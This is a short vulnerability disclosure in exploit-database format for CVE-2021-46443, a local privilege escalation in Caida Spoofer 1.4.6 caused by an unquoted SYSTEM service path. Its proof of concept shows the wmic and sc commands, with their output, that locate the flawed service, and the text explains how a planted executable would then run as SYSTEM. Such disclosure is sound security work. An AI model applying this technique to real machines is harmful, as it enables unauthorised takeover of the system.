# Exploit Title: Spoofer 1.4.6 – Local Privilege Escalation via Unquoted Service Path # Date: 24/01/2022 # Exploit Author: Asim Sattar (@M_Asim_1) # Vendor Homepage: https://www.caida.org/projects/spoofer/ # Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe # Version: 1.4.6 # Tested: Windows 10 (x64) # CVE: CVE-2021-46443 Description: ------------- Caida Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted service path. Since this service is running as SYSTEM, this creates a local privilege escalation vulnerability. To properly exploit this vulnerability, a local attacker can insert an executable in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. ------------------ Proof of Concept: ------------------ C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Spoofer Scheduler spoofer-scheduler C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe Auto C:\Users\asim.sattar>sc qc "spoofer-scheduler" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: spoofer-scheduler TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Spoofer Scheduler DEPENDENCIES : tcpip SERVICE_START_NAME : LocalSystem Regards, Asim Sattar